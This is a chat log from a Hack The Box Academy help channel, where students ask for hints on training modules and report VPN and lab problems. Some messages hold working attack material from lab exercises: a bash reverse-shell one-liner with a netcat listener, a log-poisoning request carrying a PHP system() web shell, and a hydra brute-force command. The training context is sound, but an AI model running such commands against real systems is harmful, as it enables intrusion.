#modules

1 messages · Page 499 of 1

rustic sage
#

#modules
Hello all
I am new here. If I'm wrong here or I'm breaking a rule, which I don't think I am, tell me.

Work on:
#Module Linux fundamentals. I am now on
#Section Name: Service and Process Management.

My question:
(First of all, I do NOT want solutions to the module question. I'll figure it out myself. I am very serious about mastering the learning process as best as I can on my own).
But...the following
1.I start the VM
2.right click on the desktop -> Open terminal-> get root with sudo su
3.i connect to htb-student via ssh. no problem.
Problem 1: Is OpenSSH already installed? If not, how do I install it? With apt? With dpkg? How?
4. according to the first step: systemctl start ssh
Output:==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:

  1. mrb3n
  2. cry0l1t3
    Choose identity to authenticate as (1-2):
  3. Whatever I choose here, it asks for the password, which I don't know.

What am I doing wrong? What have I not understood? The error is 99% mine. I am sure of it.

Can anyone help me, please?
If I am in the wrong place, please tell me where and to whom I can address this question.

Green Punisher

drifting knoll
#

if you have already logged into the machine with the user htb-student, it reuiqres that the ssh service is already installed and running on the target machine

#

like the second command in that section shows, you can verify it using systemctl status ssh

rustic sage
# drifting knoll what do you try to do?

#modules
@Cry0l1t3
Wow...how fast you get an answer here. Thank you so much.

I would like to write down the individual steps/commands, execute them myself. To get more understanding.

I tried the command systemctl status ssh.But I don't get the same output as shown in the description.

In general, I am having a hard time understanding this section. My head is bursting.

The first three commands, under systemctl, do not give 1:1 the output what is described.
Systemctl start ssh, system status ssh &
systemctl enable ssh.

Why is it assumed that OpenSSH has not been installed when it is already pre-installed in the VM in order to log in to htb-student via ssh?

But I think I'm just blocking myself. I'll continue with the other commands.

If you have any tips, I am very open to them.
Also if you find that I have not understood something...let me know.

Thanks again for the help.

drifting knoll
rustic sage
#

Im not understanding the problem. i did 1%,(1.01), (0.01), 0.01, .01 , and 1 nothings working

hushed bough
clever imp
#

in cracking paswords with hashcat, I do not understand

from pwn import xor

I have tried the same, and it says pwn is not a module.Can someone please clarify what is happening here?

#
Python 3.8.3 (default, May 14 2020, 11:03:12) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import xor
>>> xor("p@ssw0rd", "secret")
b'\x03%\x10\x01\x12D\x01\x01'```
#

I want to understand this so I can accomplish the question Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00\....)

primal sundial
#

so p is xored with s, @ is xored with e, etc.

#

so take each character, convert to decimal representation, xor them

plucky nimbus
#

Anyone can give me a hint for the LFI module? im at the final question and im having a bit of a struggle figuring out

knotty flare
#

Same problem here. Can anyone give a hint ?

crystal beacon
#

hello, i have a question about an exercise, i believe i found the correct answer but it is not counting as correct

#

found what i was doing wrong
it requires the actual name, EX: NGinx, not the name of the service, like HTTP or SSH

hollow flame
#

it says its an interactive exercise

#

but theres no exercise in it

rustic sage
#

can someone help me w How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

#

I have absolutely no idea how to start

#

I did think of netstat and ipconfig but they didn't work when I tried

#

I mean they worked but it wasn't correct

knotty flare
#

Hi guys, I'm stuck on the last question of the SQLMap Essentials module : OS Exploitation "use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host." The hint given says its in a common directory, but when I run the option for common locations I only find the flag.txt file associated with the prior question. Can someone give me a nudge please ?

bright drift
hollow flame
#

will i lose access to completed modules as well when my student subscription expires?

rustic sage
#

++help

red obsidianBOT
#
Categories:

Page:1/10

  CTF Commands             | 
  Events                   | 
  Fun                      | 
  Giveaway                 | 
  Ippsec                   | 
  Joinable Roles           | 
  Macros                   | 
  Moderation               | 
  Music                    | 
  SlashMiddleware          | 
  Status                   | 
  Utility                  | 
  Verify                   | 
  Warning System           | 
rustic sage
#

++help fun

red obsidianBOT
#

No command called "fun" found.

rustic sage
#

++help Fun

red obsidianBOT
#
Fun

Page:1/1

  flag      
  tellmewhy Tells you why you got breached.

rustic sage
#

+emma e

#

+flag e

red obsidianBOT
#

This is not a command. Go fight off the aliens!

rustic sage
#

++emma e

red obsidianBOT
rustic sage
#

+e

#

++e

#

++help Utility

red obsidianBOT
#
Utility

Page:1/1

  author       Tells you who made me
  invite       Gives you an invite to the server
  report       Reports a cheater or a spoiler!
  support      Returns a link to the support portal
  tryverify    Informs you on how to verify
  vipvsvipplus 
  whatpfp      Returns a users profile picture

rustic sage
#

+whatpfp e

#

++whatpfp e

#

++help Macros

red obsidianBOT
#
Macros

Page:1/1

knotty flare
crystal beacon
#

++tellmewhy

red obsidianBOT
# crystal beacon ++tellmewhy

The competition used a vulnerability inWindows XP SP1 to make us look bad. But we have since worked with law enforcement, so it will never happen again.

jovial sage
#

++help

red obsidianBOT
#
Categories:

Page:1/10

  CTF Commands             | 
  Events                   | 
  Fun                      | 
  Giveaway                 | 
  Ippsec                   | 
  Joinable Roles           | 
  Macros                   | 
  Moderation               | 
  Music                    | 
  SlashMiddleware          | 
  Status                   | 
  Utility                  | 
  Verify                   | 
  Warning System           | 
gentle herald
#

any nudge for final challenge in commandinjections ?

gentle herald
#

++help academy

red obsidianBOT
#
academy

Page:1/1


Returns a link to the Academy site

stable surge
#

Hi, im doing WEB REQUEST module and when i have to use Burp Suite, it is not like section where it is explained, can someone help, please? thanks

kind fossil
#

Hello, currently in the network enumeration with nmap module. It is asking me to enumerate the host name with nmap but everything i have done, and even looked up (that said was supposed to tell you the host name) has not worked. Any help?

tropic bloom
#

++academy

red obsidianBOT
potent mirage
#

Module: Getting Started
Section: Privilege Escalation

I don't know what I'm doing wrong. I...

  • setup ovpn key to Academy sudo openvpn Academy.ovpn
  • ssh into target machine's port ssh 'user1'@target_ip -p target_port
  • I get my ip address 10.10.14.24 from ip a in a separate terminal (tun_0)
  • I set up netcat listener on my 1234 port nc -lvnp 1234 in a separate terminal
  • I try to get a reverse shell with bash -c 'bash -i >& /dev/tcp/10.10.14.24/1234 0>&1' from the ssh session, but it always times out or says that the directory doesn't exit.
  • I tried using a mobile data hotspot from my android (since I am on college wifi, which can be restrictive sometimes). No change.

I've been stuck on this for weeks, and it's really discouraging.
Please help.

west rampart
#

Please don't spam this channel with bot commands

eager kite
#

Hi all! I'm at File Inclusion / Directory Traversal - Skills Assessments. Who can help me pls? I found one important page via php wrappers but I can not understand what I can do next.. I found potential way to exploit but can not understand how

gleaming topaz
#

Hi,
I'm trying to get my academic email verified, so I can buy the student subscription, but the supportpage seems to be down.

west rampart
#

what error you get?

gleaming topaz
west rampart
#

we don't use this anymore

rustic sage
#

Hey Everyone is there any other defensive modules/paths in the academy as i can only find Javascript secure coding and deobfuscation and i need to prepare for my "Risk Analyst Role"...If anyone can help me with that also suggestions for the role are welcomed in dms. Thankyou

eager kite
crisp tartan
#

Hi, I am stuck at the Skills Assessment of SQL Injection Fundamentals. I can do everything up to the webshell part. After successfully installing it I have no clue what to do next. Any tips ?

polar sage
#

Ho guys, just a question....
How i can learn fast, are there Any books or some stuff like that?

rustic sage
#

Modules: Linux Fundamentals
Section: Working with Web Services

Need help with the following situation:
-I install apache2 according to the explanation
---apt install apache2 -y
-apache is installed.
-I start apache2 with:
----sudo systemctl start apache2

After that I open the Firefox browser in the HTB VM and enter localhost.

Output:
Error response
Error code 405.
Message: Method Not Allowed.
Error code explanation: 405 = Specified method is invalid for this resource...

Can someone help me here.

Thank you.

high zinc
#

some people need to read something and then explain it to others

#

some need to read and read even more

#

some need to figure it out bits by bits themselves, then read to confirm and fill the gaps

#

some need to learn by doing e.g. somebody showing it then them doing it again with help

drifting wing
#

++help Giveaway

red obsidianBOT
#
Giveaway

Page:1/1

clever imp
#

i've got a syntax error in sqli module. The first half of the command works just fine, but when I try to incorporate the AND, it errors and I can't figure out how to fix it.

deep patio
#

anyone available for a nudge on Command Injection - Skill Assessment?

gentle herald
#

Module : Windows privilege escalation
Section : Dns admins

i added user under domain admins
cannot read the flag
added under localgroup administrators group also
cannot read the flag
(ran cmd as admin also)

novel matrix
#

++academy

red obsidianBOT
novel matrix
#

And also try to refrain from spamming please

rustic sage
#

I have problem with last module in FILE INCLUSION / DIRECTORY TRAVERSAL. How to read index.php?

grand wedge
#

Module: Cracking into HTB
Section: request and response

It says to boot up foxy proxy as well as burp, but foxy proxy isn't configured yet as a proxy (so it's disabled) and i don't know how to do that yet

pliant bay
#

One of the task in Skills Assessment - Part I is: "Find the password for the ldapadmin account somewhere on the system". I searched around all the box with low privileged shell but I cannot find ldap admin password. I used all the techniques described in the module. Any clue?

knotty flare
grand wedge
#

I really appreciate it

knotty flare
hollow flame
#

yo guys i installed pyftpdlib now when i do this python -m pyftpdlib -p 21 it says permission denied and when i run with sudo it says no module named pyftpdlib

novel matrix
loud sparrow
#

anyone on Broken Authentication?

hollow flame
#

it says permission denied and when i run with sudo it says no module named pyftpdlib

west rampart
#

sudo pip3 install pyftpdlib

plush briar
#

hi guys can you give me instructions about how to get hacker rank on htb??

west rampart
#

do active content

narrow sable
#

Is the Instanced Browser-Based Virtual Box Parrot thing (What do I call it?) working properly at the moment?

#

I can't connect to the target boxes with it

#

I read there is a partial system outage, is that the cause of this?

#

++academy

red obsidianBOT
balmy idol
#

Can't connect to VPN for academy and can't figure out why?

knotty flare
balmy idol
#

oh thank god

knotty flare
#

I'm doing the Intro to Network Traffic Analysis (Wireshark part) and I can't connect to the Nomachine Lab.

balmy idol
#

trying to upload a screenshot of the terminal when i try to login to vpn

knotty flare
#

Here's the message I get "A connection timeout has occurred while trying to connect to '10.129.254.239' on port '4000'. The issue could either be caused by a networking problem, by a firewall or NAT blocking incoming traffic or by a wrong server address. Please verify your configuration and try again."

#

Checked config many times. Maybe I'm doing something wrong. Anyone else ?

balmy idol
#

have you connected to it before doing what your doing now

balmy idol
#

referesh the target ip address

knotty flare
lime glade
narrow sable
#

Just heard from HTB that the Academy VPN is down. Probably because plutonium used to power it overheated causing fire, death & mass destruction to facilities & surrounding village.

urban sky
#

Ok, I see other ppl are having issues with the academy vpn. Any word on status

knotty flare
#

Time for a cup of coffee

lime glade
#

i was going crazy...

lime glade
knotty flare
rustic sage
narrow sable
#

Me too I think that in fifteen more minutes I would have destroyed everything

#

Randomly re-assigned settings, regenerated everything

knotty flare
#

I did too, then I came here and read your messages guys. Good to know we're not alone in this

lime glade
#

It works now!!!

narrow sable
#

Yeah! they fixed it 😄

lime glade
#

the best words "Initialization Sequence Completed"

#

xDDD

knotty flare
#

Yes indeed, great news ! Thanks guys for the great intel 🙂

urban sky
#

Looks like its back up but maybe not completely there yet. I can't use curl on one of the target websites I'm on

sinful sky
#

HI im new

distant canyon
#

hi im new too

sinful sky
#

hi @distant canyon

#

you are not bot right ?

distant canyon
#

NO

#

I am new and trying to connect for my first module to answer the questions how to connect with RDP to 10.129.168.19 with user "htb-student" and password "Academy_WinFun!" I spawned and try to xfreerdp /v:<target IP address> /u:htb-student /p:<password> and not work

woven ledge
#

@distant canyon i mean, it should work. What type of error are you getting

loud sparrow
#

Some solve Skill Assessment - Broken Authentication, im a little stuck

distant canyon
#

how can I post a screen capture here

#

S /home/user252322> xfreerdp /v:<10.129.205.2> /u:htb-student /p:<Academy_WinFun!>
[21:38:42:020] [3245:3247] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]

west rampart
#

^solved

clever imp
#

cracking passwords with hashcat-

When I run zip2john on Misc_hashes.zip, it tells me that it is not encrypted

sage jackal
#

I need some help on the hash at module section cracking common hashes can’t figure out the right rules/masks can anyone help?

little ridge
#

Hi

#

I need some help with a Box,

#

I've enumerated the ports that are open in the box.

novel matrix
little ridge
#

Thanks

novel matrix
#

np

little ridge
#

But I don't have permission to send msg in the boxes

red obsidianBOT
#

To talk in other channels you need to verify yourself first:

  1. Send ++verify in the #bot-commands channel
  2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
    (The instructions are available in the #welcome channel)
sage jackal
desert pivot
#

Attacking web app with ffuf - Parameter Fuzzing - GET

Hi guys,
I`m stuck on this question "Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?" or to be more specific for some reason even if I add target's IP to vim /etc/hosts and assign it as admin.academy.htb I'm still not able to reach this site. If I put only IP into the browser its showing me " Welcome to HTB academy" so I guess something is wrong.
I would appreciate any help

desert pivot
#

nvm, issue solved 😄 I found out that I have put only 1 space instead of 2
GL guys!

lime glade
#

Hi !! i' m stuck in last part of lab (Part II) of Windows Privilege Escalation. Anyone could help me? Thanks in advance 😉

hollow flame
#

im doing the skills assesment section in the file inclusion/directory traversal

#

i ||read source code of index.php|| then ||admin panel source code|| then ||log poisoned /var/log/nginx/access.log with this burp suite request in repeater|| =

||GET /ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat%20/flag.txt HTTP/1.1 Host: 188.166.173.208:32633 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: <?php system($_GET['cmd']); ?> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close||

#

|| log message is empty for some reason plis help188.166.173.208 - - [17/Sep/2021:13:20:02 +0000] "GET /ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat%20/flag.txt HTTP/1.1" 200 1582 "-" ""||

#

bruh

#

why is the flag file

#

named

#

flag_yp9yq2lnlaj,sbn '[0p92eu7 ['ip9hnajlkwdh ;oaiuw8gh d;'iowahd'iagwhdp ;io8uagtwpd ;8guwao['d8ihaw['do80iawh

#

;C

#

i spent

#

30mins

#

trying to cat%20/flag.txt

#

now i tried doing ||ls|| first then read it

#

phew

#

it worked

hollow flame
mint kettle
#

hii

#

im new in here

unique valve
#

@mint kettle Welcome!

split coral
#

hi

#

i ma new

#

guy

tight glen
#

welcome

split coral
#

Thanks

#

🙂

tight glen
#

check the pinned comments if you are lost

split coral
#

ok

#

So how to start learning CyberSecurity or htb

drifting knoll
# split coral So how to start learning CyberSecurity or htb
jagged zenith
#

any hint brute force password "broken authentication"

#

When this module

surreal rain
#

Very soon 😄

wild oar
#

Hello everybody. I'm stuck on one of the Linux Fundamentals questions: "How many files exist on the system that have the ".log" file extension?"

#

I've tried a bunch of different find commands but I can't see to get the right result. Any help would be greatly appreciated.

flint moth
#

Try this

quiet halo
#

Hello. I am doing Getting Started and I am having trouble getting the right flag. I tried Gobuster and got unable to connect error. So I tried Nmap LOL. Anyways, it returned a /flag.php on port 31337. I went to 46.101.14.69:31337/flag.php found "989297b616767ea48ea42aed195e765e" which I thought was the flag... It is not apparently. I tried the other methods explained in the Web Enumeration section but non worked. I did this while on Acadamy.ovpn and also tried StartingPoint.ovpn both gave me errors with Gobuster and other methods except Nmap.

flint moth
# quiet halo

In Academy it's showing you target ip with port 31017 , so I guess on port 31337 must be something else , try banner grabbing or nmap [or any other as mentioned in module ] for that ip with specific port given

split coral
#

Hello Everybody actually I am stuck with Windows and Linux so I am having a confusion will it work on windows. I am a new member to all this so can you help me understand everything. Thanks.

#

Can one of them dm me to lemme all process for starting.

sinful tide
#

Are you asking if you can complete the Linux fundamentals from Windows? If so, yes. There’s an in browser remote desktop to have some hands on interaction with Linux.

split coral
rustic sage
#

hello

steel trellis
#

Is there a way I can add "my" faculty to the academy htb? I wanted to register with my faculties mail, but it isn't recognised...

versed crystal
#

my account balance become negative number. can someone help me?😩 and how can i upload the image of the issue?

quiet halo
unreal flume
#

Yoo guys am I correct in saying dpkg --list | wc --lines gets how many total packages are installed on a targets subsystem?

#

cause I ran it and got 748 and tried submitting it as an answer but said it was wrong but I am sure this is how you do it?

unreal flume
#

nvm fixed it

rustic sage
#

am i missing something ive managed to login as admin but when im submitting the key i find its saying the answer is wrong can anyone give me some help on this been on this for about an hour 😄 sorry im learning..

hexed tartan
ruby trout
high zinc
#

@rustic sage @ruby trout make sure that you're actually logged in as admin, and that the website doesn't just show whatever name you input

ruby trout
#

first was guest
and now loged in as admin buh still rejecting flag??

rustic sage
#

im still on it, ive been trying do it for about 3 hours now

#

😄

#

@ruby trout i cant seem to get flag im just getting guest_XXX admin_XXX etc

high zinc
#

if you succeed the flag is shown on the page itself

#

can't miss it

high zinc
high zinc
ruby trout
high zinc
#

you gotta get the flag

ruby trout
#

ok
ill try as hard as possible
thanks

high zinc
#

Ah, I figured it out

#

Try to look at the relationships between a certain 🍪 and the text displayed. Then remember which user you need to become and see if you can modify something to change the username.
@ruby trout @rustic sage

#

oh, and yes, the flag itself is shown very clearly when you succeed - can't miss it

lilac jungle
#

Anyone working on 'Secure Coding 101' module, I am looking for help regarding the Skills assessment.

unreal flume
eager shale
#

Hi , im trying to pass the Linux Local Privilege Escalation - Skills Assessment.
Im stuck on flag5. That means i can not escalate from tomcat to root.
Can anyone please give me a hint to proceed?
Thanks

tight glen
vocal cloud
#

i have the same problem, have you get the solution?

foggy valley
#

could use some assistance. Currently working on Linux Fundamentals > Working with Web Services. I've installed Apache2 on my VM, but when attempt to open http://localhost, get an error 405

vocal cloud
#

i need help for the hacking wordpress module, i used wpscan but the website don't work on wordpress, i look the source code but i don't see the version of wordpress, is 3 hours that i search but i don't find nothing of relevant, can someone help me please? thanks

foggy valley
unreal flume
#

Yoo guys I am on web request module and I spawned my target and tryna navigate to the site and when I enter 178.62.42.158:32752 it says proxy server is refusing connections

unreal flume
#

I am using

#

yoo guys how come I am receiving a 302 Found on burp when going to my target site but on the tutorial they are getting 401 unauthorized which shows html code etc but mine doesn't show nearly as much?

#

What theirs shows

#

what mine shows

oak lagoon
#

Hey guys, I'm trying to connect to this IP via VPN on my own vm. I can curl the IP, but nmap says that the host is down. What am I doing wrong?
edit: I figured I didn't need to nmap

nimble sable
#

Hi. I have some problem with "Linux Fundamentals" module. For example so simple stuff like kernel version. When I paste value readed from uname -r submit button give an error.

#

There is more problematic questions in this module. Where I'm positive about answers but submiting gives an error

unreal flume
#

So I had to do a lot of googling

nimble sable
# unreal flume So I had to do a lot of googling

example question: Which kernel version is installed on the system? (Format: 1.22.3) and uname -r is: 5.10.0-6parrot1-cloud-amd64 It does not matter what value I'll paste. Full or just 1.10.0 or 5.10.0-6 submit always gives an error. Frustrating.

uneven pond
#

Hi, anyone who can help me with this issue I'm having trouble with?

#

I don't know what I should do

#

oh, ok I have to admin:password and use burp suite

#

it's not a question it is a flag I'm done

unreal flume
#

well not firefox

#

but whatever search engine you use

#

you need to give it two parameters aka num1 and num2 which are in the question

steel trellis
#

Is it in plan to make more modules for Defensive side?

#

Also is there a EST for these modules?

unreal flume
steel trellis
unreal flume
steel trellis
#

Some recommend to start learning networking and build up from there

#

Some people recommended me CCNA>Security+>Linux+>AWS>CISSP

high zinc
#

I know it's on their TODO list, especially since they have been looking for content developers specifically for defensive content, however I'd like to recommend - as well - to explore more offensive theory as this is really what you want to defend against in the first place

#

Of course you can rely on public information and show your future managers that you have all the IoC's already noted down and just need to update your SIEM and EDR to trigger on these and everything's good...

#

And this is definitely better than not having done anything, but being subscribers to other people's research will keep you behind the trend

#

Like storm proofing your home at the end of the hurricane season

#

Knowing both worlds makes you a much stronger analyst because it enables you to not only prioritise between the events that are happening, but also explain why you may want to recommend doing something which isn't in the CISSP Holy Grail Checklist

#

anyway... but yeah, stay tuned @steel trellis and @unreal flume, I'm confident that blue team oriented content is on the drawing board 😄

rustic sage
#

In Linux Fundamentals/Package Management it shows how to install strance for Ubuntu 18.04 LTS.
Whenever I run the command that is provided in the Parrot Terminal, connection gets timed out when connecting to archive.ubuntu.com.

Is there anything else I am supposed to do to make it connect properly with the Ubuntu Archive?

west rampart
#

Are you a Free user? 🙂

sly nebula
#

Hi, I can't spawn containers on "Cross Site Scripting (XSS)" - Session hijacking. Could someone look into this? Thanks!

#

OK, never mind. Just came up after 5 minutes. Sorry for the noise.

rustic sage
west rampart
#

Free users don't have access to the internet 🙂

modest trench
#

Hey,
Can someone guide me with Local File Inclusion after I found credentials for mysql. Please

floral brook
#

I just wanted to say how great the Windows Privilege Escalation module is! It’s the 19th module I’ve completed and it was by far the best. There is a lot of content that is presented in a very clear way and the examples and skill assesments are very well chosen. Thanks a lot, @blissful verge !

hollow flame
#

what is CPE credits submission?

tight glen
hollow flame
#

oh

#

nice

#

looks like they are adding some more things with alot of new modules incoming

#

billing page revamp

#

and exam vouchers :O

steel trellis
urban sky
#

@uneven pond I think the mistake I kept making was setting the parameters as 2 different numbers that equal 1337when it should have just been num1+num2=1337, or num1=1337

uneven pond
plucky nimbus
#

Anyone can help me with Attacking Web Applications with Ffuf?
Im stuck at the final assessment, on this question
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
Having some trouble finding the page
Would appreciate a hint.
Please pm/ping me

tight glen
#

Hi, currently doing the Login Brute Forcing with Hydra
Skill Assesment: Website second question:

  • 5 Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Could someone provide some guidance? I think im close, here is my current attempt:

#

||
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 46.101.91.241 -s 30624 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:T=<form name='HTB{'"
||

viral yarrow
#

i cant seem to figure this one out, any tips besides check all conversations?

viral yarrow
umbral nebula
#

@viral yarrow @icy snow you still need help?

icy snow
#

I have the answer but was trying to walk @viral yarrow through it

west rampart
#

Yes you can either use your own vm or buy any amount of cubes or subscribe 🙂

vocal cloud
rustic sage
#

Hi can I get a help here? I'm working on getting startd Privilege Escalation module.

  • I've got into user2 account, and checked the contents in id_rsa
  • The module taught me to do;
    bulias@htb[/htb]$ vim id_rsa
    bulias@htb[/htb]$ chmod 600 id_rsa
    bulias@htb[/htb]$ ssh user@10.10.10.10 -i id_rsa

whenever I do vim (id_rsa), it pops up with new window with nothing(sorry, I'm total noob) and don't know where to go from there.
Can somebody give me some guide or hint what to do after vim window is on?

#

and it seems like i already have permission to read id_rsa file on root, however, I'm not sure how to use it to connect ssh with root.

#

Pleeeeeese help

lilac jungle
rustic sage
lilac jungle
#

use sudo

rustic sage
#

don't have password for user2

#

and have password on user1 but it didn't had permission to use sudo uhhhh devastating

rustic sage
#

Got it 🙂

ionic bloom
#

Hi, I've been stuck here for hours now, it's time to ask for help.
Module Broken Authentication - Predictabile Reset Token - Question 1
Here the algorithm used to get the token should be md5(username . linux_epoch_in_ms_date_of_creation) so
md5(htbuser1632235373000), which is7e465309868c1713c1fa8e2a54784397 and not the token given me by the system.. I've also tried + and - some seconds.
I think I didn't get the question properly, can someone help me please?

floral brook
ionic bloom
#

Thanks for answering! No, i want to be htbadmin, but If the algo doesnt work for htbuser, it's not gonna work for htbadmin 😦

floral brook
#

Ah ok. Did you use md5(YOURSTRINGHERE.encode()).hexdigest()?

ionic bloom
#

md5(("htbuser" + str(1632235373000)).encode()).hexdigest()

floral brook
#

I’ll DM you.

ionic bloom
#

Solved thanks to iougiri!

ionic bloom
fading coyote
#

hey everyone, can anyone help me with the instruction address, specifically "finding a return instruction", module: STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86

distant tide
#

I'm stuck in the Public Exploit session of Getting Started module, nmap scan doesn't find anything or freezes when I give -p- as flag

ionic summit
#

Is there any plan to offer a higher tier annual subscription for the academy? Just curious.

proper meadow
#

Complete noob here, decided to work on the bug bounty path as a way of getting started with infosec and getting stuck on HTTP methods - specifically the POST method module. I get the hint about the cookie, but I was hoping for ... I dunno, maybe another hint? I'd prefer not to just be handed the answer, because it's the figuring it out is where you learn

sage granite
proper meadow
#

I'm in school for compsci, have my AWS CPP, CompTIA A+, Net+ and Sec+

#

so I'm a noob when it comes to using the tools I should say. I'm not a computer noob.

#

And you know, I wanna know this stuff because it's going to play into my ability to architect secure AWS systems.

#

so hard is OK. I think I figured it out - like everything, the devil is in the details.

sweet galleon
#

if we get subscription and completed a module, but decided not to continue subscription the following month.
do we still have access to those modules that we have previously completed?

urban sage
#

Yes. You maintain access to modules you have unlocked prior.

sweet galleon
#

nice, that's good to hear

tight glen
#

Hi, currently doing the Login Brute Forcing with Hydra
Skill Assesment: Website second question:

  • 5 Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Could someone provide some guidance? I think im close, here is my current attempt:

#

||
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 46.101.91.241 -s 30624 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:T=<form name='HTB{'"
||

candid hamlet
#

Hi, I'm doing Stack-Based Buffer Overflows on Linux x86 and the question in Take Control of EIP, just doesn't make sense to me

sterile hawk
#

What’s wrong?

candid hamlet
#

Examine the registers and submit the address of EBP as the answer.
This is highly dependent on my input

ocean thunder
#

Hey can anyone help me with skill assessment of file inclusion/directory traversal

candid hamlet
#

And if i dont segfault, i'd need a break point, and if i made a breakpoint, wouldn't the EBP be dependent on where i did that?

sterile hawk
#

Which section is this? Just trying to check the context

candid hamlet
#

The one called Taking Control of EIP

sterile hawk
#

Well you’re given input to enter, which causes the program to crash. You can then inspect the value of EBP after the crash

candid hamlet
#

Cannot see where i'm given an input

#

Ahh the payload from before. Can't say i find that super intuitive.

#

Would have prefered for there to be a short line about using the payload from above, in the question text

modest trench
#

Hey,
Can someone guide me with Local File Inclusion after I found credentials for mysql. Please

mint crystal
#

Has anyone done the Local File Inclusion Skills Assessment? Would love a nudge 😛

soft grotto
#

Hey all! I'm a noob here and could use a little help. I'm on the getting started knowledge check with the GetSimple website. Found creds, but can't use? Can someone give me a nudge?

soft grotto
mortal basin
#

@candid hamlet thanks for the note. Will look into making it clearer that you should use the same payload.

ionic bloom
#

Hi, sorry but after 4 hours of failures, I'm going to ask help again 😦
Module: broken authentication - bruteforcing cookies
Question: Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?

So I managed to decode and encode the cookie as role:admin and got a 'successfull' response. But not successfull enough, as it seems :/
I've tried a lot of combinations with user and role, but nothing seems to work.
I've also tried to bruteforce the 'time' param in the decoded cookie but nothing. Can somebody help me please?

woeful moss
#

Hey, I've been trying for a while to get the answer to a Question.
I looked at it for so many times already, but I don't get it.
The Module is Getting Started - Public Exploits - First Question.
I don't know if I forgot something or simply wrote it wrong, could someone help me please?

woeful moss
#

I use Metasploit (msfconsole) and exploitdb

soft grotto
woeful moss
#

do you mean rhosts and lports?

soft grotto
#

yep

tired raft
#

hi

soft grotto
#

I believe you want to make sure you're using your tun0 for your LHOST

woeful moss
#

I think it is right but i dont know

soft grotto
#

double check those, if you need your ip, use: "ip -a" command. That will give you your ip info.

#

I will also tell you need to pay attention to anything in the MSFConsole that has a "yes"...That means you will need to set that item.

woeful moss
#

ok but I don't think I have the right exploit in use

#

sorry if Im not exact

proper meadow
#

Alright, still stuck on the HTTP POST module. I modified the cookie so that I was an admin rather than a guest, re-encoded it and submitted it through Burpsuite which the website accepted, but I'm not exactly sure what the module is looking for as an answer. Any pointers?

soft grotto
soft grotto
woeful moss
#

Ok thanks

proper meadow
mint maple
#

Hello anyone from HTB Staff can help me with HTB Academy with a payment?

proper meadow
#

I ended up having to call my bank because HTB is based in the EU, which was blocked by my bank without special authorization.

soft grotto
proper meadow
#

gotchya. I'll keep at it - keeps me entertained while I'm taking calls for the scam computer repair service.

soft grotto
#

hahaha

proper meadow
#

btw I REALLY wish we could change our nick on this server

#

oh wait, is this because this is the nick I signed up with HTB with? yikes.

#

I need better taste.

soft grotto
#

lol yeah.

#

haha

#

think you can change your name on HTB?

#

¯_(ツ)_/¯

#

I would anticipate if you did you could get it to update here too?

rustic sage
#

Hi

mild mica
#

has anyone done the assembly language module? im having trouble with how im supposed to even open this file so i can find the hex value

rustic sage
#

If it tells me to SSH with htb-student, isn't there supposed to be an ip address included? (Linux Fundamentals)

soft grotto
#

Yes, when you spawn your box, you'll be given that IP

rustic sage
#

I have no option to spawn it tho

soft grotto
#

Are you at the end of a section? If you look just above the questions, there should be a link.

rustic sage
#
Answer the question(s) below to complete this Section and earn cubes!

 SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"
soft grotto
#

yeah, I think it's just above that?

#

not in my VM at the moment, i can hop on in a sec

rustic sage
#

The only thing above that is the word Questions

soft grotto
#

hmmmm. gimme a moment to login

#

Should see something like this where it says "Click here to spawn target system"

soft grotto
#

What's right below that? Anything that says to spawn a target or just the questions?

rustic sage
#

Just the questions

soft grotto
#

Also, are you using vpn or the pwnbox

rustic sage
#

vpn

soft grotto
#

don't know that it matters, I think you still have to spawn the target

rustic sage
#

But that shouldn't affect if I can spawn it or not

soft grotto
#

huh...it should be there. Maybe look above that where you have the big window for your pwnbox?

#

correct, there should be a link around there somewhere

#

So that's what i see, questions are just below the end of the screenshot there

rustic sage
#

I have information > pwnbox > questions

#

With no link to spawn

soft grotto
#

which module are you on, maybe I can look in there and see?

rustic sage
#

Linux Funamentals - Web Services

soft grotto
#

hmmm. That one you may have to start the instance to do? I'm seeing the same thing you are

rustic sage
#

For these questions I don't really need to connect anyways, so I will just do it without

#

Thanks anyways

soft grotto
#

yeah, that's true. sorry i wasn't more help. I'm new to all this too, haha.

proper meadow
#

Hey @soft grotto I've just been playing with HTTP POST/GET parameters, and I'm kinda lost. Manipulating the cookie causes me to get a "Welcome admin_hash" and manipulating the application type from x-www-form-encoded to json causes the application to time out. Attempting to submit the admin/password credentials instead of guest/guest gets me a 400 error. Any suggestions for me?

soft grotto
proper meadow
#

Yup.

#

So I authenticated as guest, and then manipulated the cookie to get the admin_hash page, but that's not the flag.

soft grotto
#

using burp, you can get the cookie and use ctr+b to decode/recode. There's a specific thing it's looking for on the cookie

#

think of it this way: You can have lots of users. How many admins would you have?

proper meadow
#

